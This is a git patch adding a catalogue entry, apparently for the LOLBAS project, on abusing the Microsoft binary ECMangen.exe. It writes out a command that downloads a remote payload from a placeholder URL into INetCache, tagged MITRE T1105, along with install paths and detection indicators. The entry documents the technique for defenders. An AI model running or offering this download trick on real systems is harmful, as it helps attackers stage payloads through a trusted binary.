From e31a869ae43866398456271778aaec7a8c3ddd2b Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Wed, 28 May 2025 16:22:56 +0300 Subject: [PATCH] Add ECMangen.yml (#373) --- yml/OtherMSBinaries/ECMangen.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OtherMSBinaries/ECMangen.yml diff --git a/yml/OtherMSBinaries/ECMangen.yml b/yml/OtherMSBinaries/ECMangen.yml new file mode 100644 index 0000000..a61b8fb --- /dev/null +++ b/yml/OtherMSBinaries/ECMangen.yml @@ -0,0 +1,28 @@ +--- +Name: ECMangen.exe +Description: Command-line tool for managing certificates in Microsoft Exchange Server. +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: ECMangen.exe {REMOTEURL} + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\ECMangen.exe + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\x64\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe + - Path: C:\ExchangeServer\Bin\ECMangen.exe +Detection: + - IOC: URL on a ECMangen command line + - IOC: ECMangen making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad'